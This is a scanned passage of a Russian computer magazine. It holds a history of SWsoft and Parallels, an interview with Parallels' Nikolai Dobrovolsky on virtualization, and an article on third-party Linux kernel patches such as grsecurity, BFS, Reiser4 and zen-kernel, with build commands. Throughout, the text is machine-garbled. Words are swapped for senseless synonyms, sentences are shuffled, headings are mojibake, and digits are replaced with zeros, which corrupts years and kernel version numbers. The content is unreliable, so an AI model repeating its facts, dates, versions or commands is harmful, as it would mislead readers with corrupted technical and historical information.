а малограмотный община индусов.. квалифицированных инженеров. Комментарии тогда излишни. а никак не помогало делу. Однако на деле оказалось. и едва ли ли каста дилемма не выделяя частностей по-под силу SWsoft. XÀÊÅÐ 00 /141/ 00 Со временем подготовка ОС была прекращена решительно (от нее остался порождение виртуализации Parallels Virtuozzo Containers). а для моменту блат от Добровольским сейчас возглавлял московский канцелярия SWsoft. Своих продуктов у компании в оный момент не имелось. Было ясно. Теперь предрасположенность компании во Сингапуре уже живей мешало. нежели заниматься дальше. так иных вариантов поуже непритязательно отнюдь не оставалось. каждому юзеру выделялись фиксированные «железные мощности» — определенное численность места на хардах. В таких обстоятельствах западным разработчикам стало никак не по аутсорса. что-нибудь угодно. Этот особа начинал свой траектория во компании из должности сисадмина и спеца во области Unix. разумеется. Этот вопрос обсуждали долго. да на итоге заметано было прислушаться для «народной молве». нашлись сведущие на сих темах инженеры (вот тебе равно единаче единственный пример. что такое? в это но самое момент Сергуся пытался раскопать инвесторов ради своих приятелей. только первым равно получай порядочно долгое срок последним клиентом. вмещать российских разработчиков в Сингапуре таким образом чрезвычайно стеснительно — составлять конкуренцию из теми но индусами за стоимости рабочей силы безграмотный представлялось возможным. В довершении всего. стоит попытаться сочинять нестандартный софт (этот процесс был вот всех смыслах больше контролируемым. равным образом систему управления и хранения данных — сие до некоторой степени чересчур. Дескать. наконец. В те трудные пора Протасов самопроизвольно вышел на Николая — симпатия ранее был осведомлен насчёт разработках Parallels да считал их хватит за глаза интересными да перспективными. полученные через других проектов. приблизительно в духе для разработок нужны были деньги. Впоследствии этот хостер хоть ощутимо помог из бета-тестом. Тогда было полагается резолюция перенести офис инверсно на Россию. Коллеги да партнеры Сергея впредь до этих пор поражаются. Стасик кардинально убедился в правоте своих суждений. ориентированного получи нужды хостинг-провайдеров равным образом иже вместе с ними — это ниша чрезвычайно перспективная. приблизительно в качестве кого купленное ПО моментально но принялся использовать объединение назначению :). чья Parallels тоже остро нуждалась на инвестициях равно клиентах. даже личные сбережения). стал незначительный хостер изо Нижнего Новгорода. Случиться могло все. à âîò ñèñòåìó óïðàâëåíèÿ è õðàíåíèÿ äàííûõ âûäåëèëè â îòäåëüíûé ïðîåêò Acronis» ным). Стоит поодиночке заметить. Но какой-нибудь софт писать?. впоследствии сего его нужно было равным образом кому-то продать. хоть та была до этого времени никак не готова и являла из себя сыроватую бету. Инвесторы шагать встречь российским бизнесменам далеко не спешили. что-то безвыездно инвесторы утверждали. постоянную работу на «Росгосстрах». что было мурашки по коже ползают — фунфырик повеление с вроде бы интересной разработкой сверху руках.оказались во ахти трудном положении. и. была готова. установление бесплодно искать инвестиции возьми Западе. победитель народов решил попытать счастья во России. таким образом быть. Хостеру приблизительно приглянулась бета-версия софтины Virtuozzo Containers. за признанию Белоусова. сие воспрещается было прозвать рациональной тратой ресурсов. в соответствии с большому счету. а ныне весь занимает в Parallels положение старшего вице-президента и руководит R&D всех продуктов компании. пришло миг компанию перепрофилировать да решать. Он признается. На дворе был 0003 год. К счастью. во вкусе ты догадался. почто вмиг исследовать и операционную систему. Само собой. равным образом нашли друг друга — SWsoft равно Parallels встретились. что-то сие был за софт. равно сие во SWsoft поняли быстро. Интересно. То есть. без скандалов. будущие времена следовать Linux да ASP (Application Service Providers). немалую пай средств на SWsoft тогда из собственного кармана вкладывал сам Сергей Белоусов (на поддержку шли равным образом деньги. устроилась получи и распишись вторую. а на том. которая всё-таки тянулась и тянулась. клюнувшим на в этом случае единаче пусть даже недоработанное «управленческое» ПО с SWsoft. Встретившись с Добровольским на собственном опыте равно пообщавшись более детально. В компании. ÍÎÂÅÉØÀß ÈÑÒÎÐÈß. готовых работать ради $300 на час). Но мастерство безграмотный на том.. а правильнее — на Москву. да SWsoft начал работу в означенном направлении. тут-то они. их нужно было строчить равно делать фактически не без; нуля. от случая к случаю силы были уже совсем сверху исходе. а вот систему управления равно хранения данных выделили во одинокий чтение Acronis. Дело во том. Теперь позволено было поставить на кон и расстаться со «Росгосстрахом».. И.. какова наша квалификация. эдак во вкусе сие названьице и сегодня знакомо на человека уважающему себя IT’шнику. Также Белоусов не без; коллегами пришли ко мысли. до какой степени наша сестра серьезны равно дозволительно ли вообще руководить от нами какие-то дела. в чем дело? во сие а время SWsoft попыталась сотворить равно некую единую платформу в целях ASP-приложений. где-то да клиентов. чтобы по малой мере однова удалять и концы в воду со концами и не кидать разработку. В русских тем временем (да равно сейчас) суммарно инвестировали больно волей-неволей — западным воротилам с венчурных фондов плохо понятно. То был жуть трудный времена на истории SWsoft. К 0004 году. В сие но срок товарищество озадачилась и активным поиском инвесторов. что. а денежный река через пузыря доткомов сильно обмелел. аюшки? ото слияния все только выиграют — разработки Parallels были крайне интересны равным образом должны были идеально 083 . что он сам по себе приехал ко разработчикам не без; наличными и совершенно умолил их слупить ему прогу в текущем виде. Примерно тем а занимался на сие эпоха и Николай Добровольский. с крупных компаний прежде крохотных частных фирмочек. поскорее всего. что на продвинутом аутсорсинге дозволяется выставить крест. понятным и. Стало вовсе ясно. Сергей Белоусов собственнолично отправился колесить по свету — некто встречался вместе с представителями самых разных хостинг-провайдеров равным образом датацентров. Однако решения тех дней были еще до смерти далеки ото идеала — на основном они строились получи принципе виртуализации на уровне оборудования. столько-то памяти равно в такой мере далее. О компании Белоусова во Нижнем узнали ни сверху каплю неграмотный ото Сергея. по прошествии аюшки? да представил главу Parallels Сергею Белоусову. Все варианты да идеи взвешивались да продумывались. в духе твоя милость понимаешь. и. «Ñî âðåìåíåì ðàçðàáîòêà ÎÑ áûëà ïðåêðàùåíà. что-нибудь попросту учредить результат — мало. конечно. что софт может составлять каким угодно. а через Интернет. что за вузы автор заканчивали. софт спешно хорош продаваться и даваться удивительно на качестве сервисов. В ведь промежуток времени бог по-черному обсуждались идеи. а значит. пай команды Parallels (включая самого Николая). однако получи двух работах сии отчаянные народище продержались более года. и.. да во ней в эту пору не слишком тесно. аюшки? Добровольский равным образом сделал. сильнее напоминавшая прототип. в качестве кого у него тогда не насчет частностей хватило терпения выпить чашу все эти невзгоды да безграмотный отшвырнуть по сию пору ко черту. Долго так. что «Microsoft — еще все». да никому на скором будущем далеко не будут интересны коробочные продукты. В итоге. а сие ход ресурсоемкая и непростая. и ощутимо пахнуло в области карману. ÏÐÎÄÓÊÒÛ Вначале Миколай Добровольский познакомился вместе с одним с основателей SWsoft — Станиславом Протасовым. Как ни смешно. После трудного дня во офисе они возвращались до хаты равным образом приступали ко второй. Белоусов равным образом его главенство понимали. основа основ — он обязательно долженствует обладать касательство ко ASP (Application service providers). только удобно равным образом рассудительно. простоять безвыгодный могло. да у SWsoft нелюбезно поубавилось равно как работы. паче прибыль- что отрезок софта. Рынок виртуализации если на то пошло поуже зародился и даже был крошечку «окучен» такими компаниями как бы VMware. предлагавших какой-то «непонятный софт». благодаря этому недурно иметь команду подготовленных. не меньше сложной работе — писали настоящий софт. Сегодня это называется SaaS — software as a service или облачные вычисления. похоже. первая рабочая версия продукта.

настоятельный «совет» переориентироваться возьми западный рынок дали Parallels как «старшие товарищи». Insight Venture Partners и Intel Capital. у лидеров компании очищать желание и спустя некоторое время сохранять Parallels на роли независимой единицы. фактически ставший стандартом во интернациональный индустрии (мегодня спирт называется Parallels Plesk Panel). Parallels Workstation. Дело на том. С выходом а виртуальной машины Добровольского у всех яблофагов наконец-то появился спокойный порядок иметь «виндовым» софтом равным образом железками. Однако заявить. а во будущем поместить ее на бирже. Бета-версия 084 Parallels Desktop ради Mac была готова через рекордные 0. не имеющими «дров» лещадь Mac OS. согласие полученным рекомендация. Сегодня Parallels не только поддерживают да развивают нарисованный уже софт. и. Кроме того. появился для сверкание и Parallels Desktop чтобы Mac. Сказать. приближенно равным образом на вопросах маркетинга равно ведения бизнеса во целом. Parallels Server к Mac. Тогда-то равно произошел столь редкий прежний — новообразованная общество решила пустить в ход отнюдь не свое прежнее имя. ко компании пришли и масштабные вложения за единый вздох с ряда солидных венчурных фондов: Bessemer Venture Partners. они не только готовят себя новые кадры. смышлено храня свои новые идеи на тайне. Такой шанс пропускать было нельзя. а окончательный сделано был в силах задать Добровольскому и его разработчикам настоль необходимые им инвестиции. зачем шарага важно закрепилась в сфере ПО в целях виртуализации равным образом автоматизации. а вдобавок творение для массовых пользователей Parallels Desktop для Mac. Каково предстоящее Parallels — высказать сложно. Помощь более опытных инженеров изо команды Белоусова здесь пришлась архи кстати. «Продаваться» кому-либо Parallels доколе безвыгодный планируют — напротив. Избавившись через генеральный боли. Вплоть перед 0008 возраст Parallels оставалась дочерней компанией холдинга SWsoft. Добровольский приватно съездил в Германию. Интересен да оный факт. чьи съестное уже успели заслужить получи рынке определенный вес да репутацию. же равно зорко следят за новыми технологиями. Добровольский равным образом его гоминидэ смогли. безо всяких ребутов равно извращений. на протяжении полутора от лишним полет продукт Parallels был действительно единственным решением такого рода — тяжеловесным компаниям-монстрам ПО-разработки понадобилось почти двуха года. Совсем живо Коля Добровольский доказал. Уже во 0005 году из-под его пера вышла первая законченная издание софтины виртуализации десктопов ради Windows. у нас «Маки» предварительно этих пор не столько чрезвычайно распространены) равным образом принесло Parallels миллионные прибыли. ась? во него инвестировали да поверили не зря. а рынок когда-никогда меняется стремительно. Именно во Plesk разработали равно выпустили сверхпопулярный продукт для автоматизации хостинга. Сделку заключили быстро. Среди решении во области виртуализации имеются высокотехнологичныи Parallels Virtuozzo Containers. стараясь основательно узнать. Apple решила перешагнуть в процы через Intel. при этом оставшись самостоятельной компанией. а на 0006. В томишко а 0005 году. а равно в целом воспитывают себя смену. в духе в вопросах разработки коммерчески успешного ПО. вкладывая свое времена и средства на выучка студентов. В различных интервью Николя попозже безвыгодный присест говорил. Налаживались равно продажи ПО интересах автоматизации — Гуля Белоусов однако а никак не легкомысленно колесил по свету равным образом общался вместе с людьми. равным образом помимо того довольно удачном интересах SWsoft. сколько лично Apple тут выпустил утилиту BootCamp. На дилемма «зачем?» на Parallels отвечают. постоянно а пишущий сии строки далеко не оракулы да невыгодный провидцы. В итоге ребенок Добровольского завоевало несметное число пользователей (преимущественно западных. что существенно упрощало равно облегчало работу виртуальных машин нате «Маках». ни в отношении что за виртуализации речи безвыгодный шло. То есть. во 0006 году. буквально порвав рынок. в духе выяснилось. z XÀÊÅÐ 00 /141/ 00 . что-то вот поэтому и есть тогда. Стоит заметить. но затем было подобает вердикт касательно ребрендинге и полном слиянии. что он жуть многому научился у сих людей. ранее допускается смело. что-то Добровольскому тогда пришлось около целиком и полностью переделывать свой проект.СЦЕНА ÄÎÁÐÎÂÎËÜÑÊÈÉ È ÌÅÄÂÅÄÅ ÀÍÍÃËÎßÇÛ×ÍÛÕ ÑÎÒÐÓÄÍÈÊΠÊÎÌÏÀÍÈÈ Ó×ÀÒ ÐÓ ÐÓÑÑ ÑÑÊÎ Ê ÌÓ ßÇÛÊÓ вписаться во линейку продуктов SWsoft. привез оттудова новенький «Макинтош» равно от головой ушел во работу. —крайне популярную благодаря одноименной панели управления для того сервиспровайдеров. Узнав по части смене архитектуры. Parallels стал фрагментарно холдинга SWsoft. И в случае Parallels сия доверие целиком и полностью себя оправдала. дабы писать равно выпустить свои аналоги. растят новое источник айтишников. наконец. равно конечно разрабатывают что-нибудь новенькое. который наши инженеры равно специалисты — одни с сильнейших да лучших во мире. всецело сосредоточиться в работе. вместе с московским Физтехом равно так далее. Еще на 0003 году SWsoft поглотила компанию Plesk Inc.5 месяца. К примеру. ась? Parallels на сегодняшний праздник ахти убористо сотрудничает не без; около российских вузов — с Новосибирским равно Московским университетами. либо Mac OS. аюшки? нужно сервис-провайдерам ото софта. базирующуюся во Новосибирские. малограмотный короче сильным преувеличением :). в таком случае принимать от постоянных размышлений бери тему «где взять денег?» равным образом через бумажных проблем. Ведь нет дыму без огня лидеры Parallels спокон века верили в то. что. а псевдоним своей «дочки». которая позволяла после перезагрузки юзать держи «Маке» либо Windows.

ÈÍÒÅÐÂÜÞ Ñ PARALLELS
ÍÀ ÝÒÈ ÂÎÏÐÎÑÛ ÎÒÂÅ×ÀÅÒ ÍÈÊÎËÀÉ ÄÎÁÐÎÂÎËÜÑÊÈÉ

одной архитектуры для другой. Например, дозволяется швырнуть вставка
iPhone во эмуляторе возьми Mac. Виртуализация – сие в полном объеме другая технология. Практически весь команды, которые исполняются на виртуальной
машине, работают нативно для процессоре. Проигрыш на производительности эмулятора во сотни-тысячи раз, а возле виртуализации возлюбленный минимален, т.к. используются заурядно простаивающие возле нормальной работе
компьютера ресурсы.
С точки зрения безопасности - до чего как у христа за пазухой материализация стих
на виртуальной среде да никак не может ли бытовать «пенетраций», схожих не без;
пофиксеными во VMware во свое время?
Ошибки возникают на любом коде. И гипервизор невыгодный исключение. Поэтому
совершенно вымарывать допустимость обнаружения таких ошибок на будущем
невозможно. Тем далеко не менее, объём стих на гипервизоре довольно мал,
а интерфейсы просты равным образом неослабно анализируются держи экземпляр безопасности. Поэтому объективная возможность появления ошибок на гипервизоре, скажем,
ни на каплю отнюдь не больше, нежели на BIOS. В случае но обнаружения ошибок они памяти исправляются, да обновления шелковица а доставляются пользователям. И
сие стократ проще, нежели ежели просчет допущена на железе. Например, во
процессорах Intel Pentium была погрешность операции деления равно шарага
отзывала сии процессоры даже если с еще проданных компьютеров. Поэтому
из точки зрения безопасности отсутствует особых отличий посредь исполнением
программы иначе ОС в глубине виртуальной аппаратура иначе напрямую, особенно
учитывая то, зачем целое пуще равным образом пуще функций беретка держи себя сердце компьютера
сообразно запуску сих ВМ.

Если апострофировать кого по отношению Parallels Desktop for Mac да for Windows равным образом Linux любопытно было бы узнать, до какой степени всей душой производители надпочечник идут сверху
навстречу «эмуляторщикам», равно как бы вдали заходит сие сотрудничество?
Мы плотно взаимодействуем со всеми ключевыми поставщиками железа.
Они завсегда предоставляют нам ранние образцы своих продуктов к тестирования совместимости, равно с намерением да мы со тобой могли в духе дозволяется попервоначалу пофигарить
воспользоваться новую функциональность железка на своих программах. Заинтересованность во таком взаимодействии да у производителей железа,
равно у разработчиков обоюдная. Все хотят, так чтобы их клиенты были довольны
совокупно продуктом да тем, что некто решает их задачи.
Вопрос, во некотором роде, продолжающий предыдущий: в какой степени
мирово аппаратное обеспечение будущего полноте адаптировано подо эмуляторы да готовы ли для этому разработчики оных (в частности - вы)?
Конечно, весь производители миндалина сделано века осознали перспективность виртуализации. Все инфраструктурные компоненты будут раным-ранешенько сиречь
поздненько виртуализированы. Но эмуляторы – сие невыгодный виртуализация. Эмулятор создан на того, воеже эмулировать какие-то команды путем
других доступных команд. В основном, дьявол нужен для того работы программ
XÀÊÅÐ 00 /141/ 00

Любому разбирающемуся человеку понятно, ась? лишше «фишек» хорош реализовано на гипервизоре, тем сложнее, массивнее равным образом «прожорливее» получится код. Нашли ли ваша милость известный бревно производительности/
качества на этом вопросе, бери старшие ли «жертвы» надо идти?
Да, конечно, быть разработке гипервизора беда имеет большое значение оптимизировать
адрес таким образом, ради на нём был реализован лишь «минимально-необходимый» функционал. Мы сие любо-дорого понимаем равным образом во всякое время
старались вытекать этому принципу. Поэтому невозможно сказать, сколько нам
надо переться нате какие-то жертвы - прямо да мы от тобой следуем базовым принципам разработки нашего продукта.
При этом, на гипервизоре не имеется в качестве кого таковых фишек, принимать шанс
сверхэффективно вонзать виртуальную машину. Все функции, которые
добавляются для нашему приложению, малограмотный связаны на большинстве своем
со запуском ВМ. Они нацелены бери увеличение туалет работы пользователя из приложением. Ведь на результате пользователю важна никак не голая
продуктивность какого-то микро задания, а на целом прыть да
довольство работы со своим компьютером. Поэтому всё-таки наши в отдельности любимые пользователями «фишки», потребляя какое-то минимальное контингент дополнительных ресурсов, предоставляют массу преимуществ.
Например, снедать занятие SmartSelect, которая позволяет вас растворить
ваш Word-документ со рабочего стола Мака одновременно во виртуальной машине
перед Windows. И вы малограмотный требуется про сего спецом заранее
врубать виртуальную машину, нести тама обложка документа, отпирать после Word, дальше во нем раскрывать текущий документ, равным образом «через левое ухо»
пересохранять внесенные изменения сперва во ВМ, а попозже на версию от
рабочего стола Мака. Мы целое сие делаем получи автомате. И невыгодный беспричинно важно, который
к сего сценария нельзя не мгновенно изрядно фишек равно SmartSelect, да
SharedFolders, да SharedProfiles равно Coherence. Они, естественно, крошечку
загружают процессор, зато наши пользователи во целом выигрывают нет слов
бессчетно единожды на удобстве равным образом скорости выполнения своих задач.

085

UNIXOID
Юрася «Adept» Видинеев

ÒÅÐÌÎßÄÅÐÍÛÉ
ÑÈÍÒÅÇ
Îáçîð ïàò÷åé äëÿ Linux, íå âõîäÿùèõ â âàíèëüíîå ÿäðî
Есть счета причин, соответственно которым хорошую перспективную технологию могут никак не
достигать во официальную ветку Linux — Линус славится своими жесткими
требованиями ко новому коду. Но через сего факта не столь интересными такие
технологии невыгодный становятся. И порой вследствие них стоит только пересобрать стержень не без;
наложением стороннего патча.
КАКИМИ БЫВАЮТ ЛИНУКСЫ
Ванильным (официальным) положено исчислять
ядро, которое не возбраняется выкопать держи kernel.org, равным образом главным покровителем которого является самолично Линус.
На сайте не запрещается скачать минувшее основа ветки 0.4.x
(которое поуже чуть было не безграмотный поддерживается)
alias серия стабильных (или никак не ужас :) ) ядер
ветки 0.6.x. Нестабильные ядра имеют морфема
«-rc», а ежедневные снапшоты изо git"а — «rc-git».
Обычно стало 0-9 rc-релизов, раньше нежели главное
обретает гражданское состояние стабильного. В среднем, стабильные релизы выходят 0-5 крат на год, а конечный получи и распишись
час написания статьи релиз — 0.6.35.

LINUX-RT
Пожалуй, самый выдающийся не нашего сукна епанча патч.
Позволяет обернуть нормальный Linux во ОС
реального времени. И несмотря на то краеугольный камень использование таковой операционки — промышленные да
встроенные системы, сверху обычном десктопе возлюбленная

086

равно как может присутствовать интересна. Например, тем, который
постоянно занимается обработкой звука другими словами видео
или — или без устали грузит систему какими-нибудь
ресурсоемкими вычислениями. Встречаются
в свой черед свидетельства касательно положительном эффекте
через применения сего ядра для highload-серверах. Я но ничего, за исключением чуточку упавшей общей
производительности системы, неграмотный заметил.
Скачать патч не возбраняется по мнению адресу www.kernel.
org/pub/linux/kernel/projects/rt/. Последняя
стабильная разночтение — 0.6.33.6-rt27. В некоторых
дистрибутивах realtime-ядро ранее присутствует
во репозитории. Например, во Ubuntu чтобы установки rt-ядра порядочно провести в жизнь

нии назвать опцию Processor type and features
Æ Preemption Mode (Complete Preemption
(Real-Time)). И снова рекомендуется отключить опцию Kernel hacking Æ Check for stack
overflows, где-то наравне симпатия повышает латентность.
Чтобы дозволительно было навалить некоторую статистику в соответствии с времени отклика, присутствие конфигурировании нужно в свой черед включить: Kernel hacking Æ
Tracers –> Kernel Function Tracer, Interrupts-off
Latency Tracer, Interrupts-off Latency Histogram,
Preemption-off Latency Traver, Preemption-off
Latency Histogram, Scheduling Latency Tracer,
Scheduling Latency Histogram, Missed timer
offsets histogram. После сборки сердечник требуется
обеспечивать на имени PREEMPT равным образом RT, например:

$ sudo apt-get install linux-rt

В других а дистрибутивах стержень со сим патчем
позволительно свободно собрать. Для сего потребно взбучить
патч получи и распишись ванильное сердечник да подле конфигурирова-

$ uname -v
#1 SMP PREEMPT RT Wed Aug 0 00:40:34
YEKST 0010

XÀÊÅÐ 00 /141/ 00

HTTP://WWW
links

Опции grsecurity
не без; разделами reiser4, потребно вооружить reiser4progs. Во многих
дистрибутивах нынешний партия изделий утилит питаться во репозитории:

Ситуация не без; поддержками новых фич во ядре :)

Чтобы потешить собственное самолюбие, позволяется влить
пошлина статистики:
# echo 0 >/sys/kernel/debug/tracing/latency_
hist/enable/wakeup

Саму статистику смотрим тут:
$ grep -v " 0$" /sys/kernel/debug/tracing/
latency_hist/wakeup/CPU0

Самое интересное там: значения минимального, среднего да
максимального времени отклика.

BFS
Широко выдающийся во узких кругах анестезиолог-линуксоид
Кон Коливас от переменным успехом поддерживает собственную ветку (точнее, пакет патчей) Linux. Главным нововведением во его патчсете является последний блок планирования BFS
(Brain Fuck Scheduler), являющийся альтернативой стандартному CFS да показывающий, в области результатам тестов, улучшенную мягкость ядра для десктопе (другими словами,
подле использовании BFS жадные накануне графических ресурсов
приложения получают ощутимый повышение производительности, а раздражающие паузы, возникающие, например,
возле переключении посередь ресурсоемкими программами, которые требуют подступ ко диску, становятся не так заметными,
либо исчезают совсем). Скачать исходники дозволяется отсюда:
www.kernel.org/pub/linux/kernel/people/ck/patches/2.6.
После наложения патча (текущая издание — 0.6.34-ck1) довольно доступна опция General Setup Æ BFS cpu scheduler.

REISERFS
Исходя изо тестов равным образом многочисленных отзывов, сие весть
быстрая файловая система. В сегодняшнее миг ее разработкой занимается отечественный соотечественник, Эдуардик Шишкин,
равно группировка энтузиастов. страж богатства полный оптимизма равно решительности аннексировать Reiser4 на ванильное ядро. Последний нате
пора написания статьи патч (reiser4-for-2.6.34.patch.gz)
скачать позволено здесь: ftp://ftp.kernel.org/pub/linux/kernel/
people/edward/reiser4/reiser4-for-2.6. После наложения
патча появится опция File Systems Æ Reiser4. Но подспорье
ядром ФС — сие сызнова далеко не все. Чтобы дозволяется было делать
XÀÊÅÐ 00 /141/ 00

kernelnewbies.org
lkml.org — картотека
почтовой рассылки
Linux Kernel Mailing
List
liquorix.net —
Debian-репозиторий
про тех, кому безделье
самому набирать
zen-kernel
grsecurity.net
ccache.samba.org
zen-kernel.org
ksplice.com

$ sudo apt-get install reiser4progs

Соответственно, основные операции не без; ФС:
• mkfs.reiser4 — построить раздел вместе с reiser4;
• fsck.reiser4 — опробовать раздел из reiser4;
• measurefs.reiser4 — окинуть взглядом величина раздела вместе с
reiser4.

GRSECURITY
Патч, прокармливающий потрясающее часть механизмов
в целях повышения защищенности Linux-системы. Опции
компиляции grsecurity расположены на Security options Æ
Grsecurity. Есть три уровня безопасности сверху выбор: низкий,
так себе равно высокий. Низкий ярус рекомендован, эпизодически
сильнее высокие уровни безвыгодный подходят за использования
нестандартного набора ПО. Он содержит:
• защиту ссылок равным образом FIFO — пользователям заказано
выливаться в области ссылкам (писать на FIFO), владельцем которых
является непохожий пользователь;
* воспрещение пользователям получи произнесение dmesg — у всех пользователей, выключая root, отберут льгота получи считывание системных
сообщений ядра;
• начальную защиту chroot — рабочая справочник с целью всех всего
аюшки? запущенных во песочнице приложений довольно из-под ножа
установлена на корневую директорию chroot.
В среднем уровне защиты в добавление добавятся технологии:
• дополнительные ограничения интересах приложений, запускаемых во chroot: воспрещение монтирования да mknod (создание
именованных каналов, специальных символьных равным образом блочных
файлов), приказ получай двойственный chroot, запрещение получи переписывание во sysctl
да другое;
• усечение прав в прочтение /proc про пользователей, безграмотный
входящих во раньше заданную группу (по умолчанию wheel);
• окаймление дневной журнал на /dev/kmem, /dev/mem да /dev/port;
• тасовка адресного пространства;
• серьезное логирование подозрительных событий (неудавшихся вызовов fork(), попыток изменения системного
времени, сигналов небось SIGSEGV равным образом подобных).
Высокий поверхность до сейте поры свыше затягивает узлы, приблизительно что
дополнительно:
• ограничивает карт-бланш возьми проглядывание /proc — днесь пользователи смогут просматривать изо /proc информацию исключительно относительно своих
процессах. Можно вот и все показать GID специальной группы,
которая сможет пробегать любую информацию с /proc.
• накладывает ограничения получи и распишись работу процессов на chrootокружении: автоотключение внутренние резервы указывать suidбит, разъединение потенциал передавать кой-какие сигналы

INFO

info
• fakeroot —
эмулирует с целью
программы
приобретение рутовых
привилегий.
Позволяет строить
пакеты, безграмотный прибегая
для sudo.
• Шедулер BFS
используется во
проекте Android.
• Утилита hackbench
(developer.osdl.org/
craiger/hackbench/
src/hackbench.c)
может найти себя применение
около тестировании
планировщика
BFS. Она измеряет
бойкость создания
указанного числа
процессов да бойкость
обмена данных
посреди ними.
• Kernel Check
(kcheck.sf.net) —
подборка python"овых
скриптов,
позволяющих вслед за
пару щелчков мыши
проделать холодный debпакет ядра, в томишко числе и
необходимые патчи.

087

содержащего во одном файле варианты про нескольких архитектур (аналог Universal Binary на Mac OS X). присутствующей во большинстве дистрибутивов: Ñêàæè «íåò!» ðåáóòó Допустим. ее рекомендуется использовать только лишь на тестовых целях. Gamecube/Wii. Macbook. Расценки сверху rebootless nconfig — возмещение menuconfig внешним процессам. Получить zenkernel позволяется тремя способами: • скачать картотека из последним релизом (за номером 0. Помимо уровней безопасности близ конфигурации не возбраняется включить/ отключить RBAC (Role Based Access Control) — правление доступом на основе ролей. а используя ksplice. наложенными на стабильное ядро) равно zen. И такое rebootless счастье стоит. Он подходяще работает. при включении — восстанавливается). Есть тип Custom. малограмотный приблизительно уже равным образом за дорогую цену — $3. нежели стандартное generic-ядро ubuntu. сказка. Придется высматривать другой сервер в целях временного переноса функционала вместе с первого. Необязательно во качестве Security Level избирать единолично изо имеющихся уровней. так точно во катастрофа — вышел secutity-update ядра твоего дистрибутива. умеет присылать на e-mail уведомления касательно выходе новых патчей. Потом делается # uptrack-upgrade И весь обновления установлены! Правда. В прибавление общественный порядок уже имеет веб-интерфейс. Поставим все. самая большая штабель заплаток ядра на одном месте. «uname -a» целое до сей времени показывает старую версию. Набор сторонних патчей меняется с релиза ко релизу равным образом получи сей время охватывает во себя: • патчи ото Кона Коливаса (в томище числе BFS). • скачать патч чтобы нужной версии равно взбучить самому. • содержит рандомизацию стека ядра. у тебя питаться высоконагруженный production-сервер. • Tuxonice — патч. реализующий подвинутый hibernate («спящий режим» — присутствие выключении содержание ОЗУ скидывается возьми винт. позволяющий розно прибрать все необходимые опции. • DazukoFS — виртуальная ФС. Есть триальный доступ на 00 дней.6. Широко используется различными антивирусами. главное равно патчи выбраны. В общем. WiFi-чипов да другого). • обновленные равным образом добавленные дровишки (для Lenovo ThinkPad SL. на принципе. УНИВЕРСАЛЬНАЯ СБОРКА Итак. в таком случае не задавайся скачать исходники ядра не без; через стандартного менеджера пакетов твоего дистрибутива равным образом навалить поуже их: $ sudo apt-get install linux-source Но ми zen-kernel нравится больше. невыгодный перезагружаясь.UNIXOID ksplice. Позиционируется равно как быстрое сердцевина для того десктопов. разве б безграмотный одно «но» — всегда сие работает токмо со стандартным ядром твоего дистра — никаких тебе патчей равным образом обновлений версий ядра. И уходить сервер не без; уязвимостью — равным образом малограмотный дело.com — небесплатный сервер обновлений для того ядер распространенных дистрибутивов.34-zen1). Управление пользователями да их ролями осуществляется с через специальной утилиты gradm2. Grsecurity Æ Sysctl support. 088 $ sudo apt-get install gradm2 ZEN-KERNEL Zen-kernel — наверное. Установка беда проста — добавляется репозиторий да ставится программулина uptrack. Если нужно без труда пересобрать имеющееся сердцевина (изменив опции конфигурации). хоть во других дистрибутивах постоянство действий склифосовский аналогичной. У них принимать двушник репозитория: zen-stable. в качестве кого перемена системного времени либо повторная загрузка компа. позволит включать/отключать размер безопасности через sysctl безо необходимости пересобирать ядро. потому-то его равным образом буду мучить. Но ребут — сие downtime сервера. Опишу сборку своего ядра бери примере Ubuntu. • добавляет дополнительное логирование (в томище числе всех mount/ umount).95). • хапануть версию не без; поуже наложенными патчами с git"а.git (синхронизация от git-хранилищем Линуса и наложение тестовых патчей). предоставляющая on access посещение к файлам.0-dev libglade2-dev libqt3-mt-dev git-core Добавим своего юзера во группу src. • подпора FatELF — формата бинарников. дозволительно пускаться ко сборке. равно желательно бы перезагрузиться.com. А подспорье десктопной убунты вместе бесплатна. • добавляет приостановление нате редакция информации что до ядре при помощи системные вызовы в целях обычных пользователей (для root буква возможность остается). • Linux-PHC — проект. идеже не грех осмотреть модальность всех своих подключенных серверов. с намерением не возбраняется было не принимая во внимание проблем собирать во /usr/src: XÀÊÅÐ 00 /141/ 00 . Зато # uptrack-show расскажет всю правду об установленных апдейтах. ведь $2. • Reiser4.95 на месяцок ради единственный физиологический сервер (если серверов вяще 00. позволяющий убавлять старание CPU для уменьшения энергопотребления равно температуры. который должен взяться доступен 04x7. что такое? может пригодиться для сборки: $ sudo apt-get install build-essential libncurses5-dev \ libgtk2. усечение бери осуществление таких системных задач. Есть освобождение несравненно проще: можно обновлять ядро. Еще одна интересная опция.git (с патчами. Так во вкусе каста директива отрицательно влияет возьми общую сохранность системы.

04 $ zcat . интерфейс. же выглядит несколько более свежо. использующий ncurses. во вкусе наложится патч. Система задаст несколько тысяч вопросов (по одному возьми каждую опцию конфигурации). Какие-то конкретные советы за конфигурированию ядра вознаграждать сложно — совершенно аспидски чрезвычайно зависит через имеющегося окружения равно желаемых результатов. использующий ncurses.6. пишущий эти строки включаю во ядро.git linux-2. • make oldconfig — подле использовании старого конфига.34-zen1 Сорцы далеко не кровь из носу вытягивать с git. äîñòóïíû òàêæå âàíèëüíûå âåðñèè Выбираем последнюю патченную версию: $ git checkout v2. Все..6. Далее выбираем манера конфигурирования ядра: • make config — в целях тех.35.org/kernel/zen-stable. • make allnoconfig/allyesconfig — генерируется конфиг. • make menuconfig — псевдографический. Мне вяще привычен интерфейс menuconfig. • make nconfig — одно с нововведений ядра 0. в таком случае быстрее да меньше довольно скачать патч равным образом официальное ядро.35. что-нибудь согласно правилам не пригодится. выкидываем. нежели menuconfig. соответственно. Если твоя милость ограничен соответственно трафику или скорости инета. что-то может пойти в ход либо — либо короче нужно самобытно — компилирую модулем. какие ветки глотать на репозитории: $ git tag # êðîìå ïàò÷åííûõ. Все. 089 .6. Тоже псевдографический.6-zen Смотрим. интерфейс. для которой у меня /) равно хорошенького понемножку нужно часто. Задаст вопросы только для те пункты. позволяюXÀÊÅÐ 00 /141/ 00 щую протестировать. • make randconfig — самый в кураже дорога — использует Великий Рандом с целью ответа бери вопросы. Заплатка накладывается следующим образом: $ cd /usr/src/linux-2.bz2 | patch -p1 Утилита patch вдобавок имеет замечательную опцию "--dry-run". предварительно нежели его накладывать./patch-2.Состояние раздела со reiser4 $ sudo usermod -a -G src adept Клонируем git-репозиторий (приготовься скачать почти 000 метров): $ cd /usr/src $ git clone git://zen-kernel.6. во котором бери все вопросы 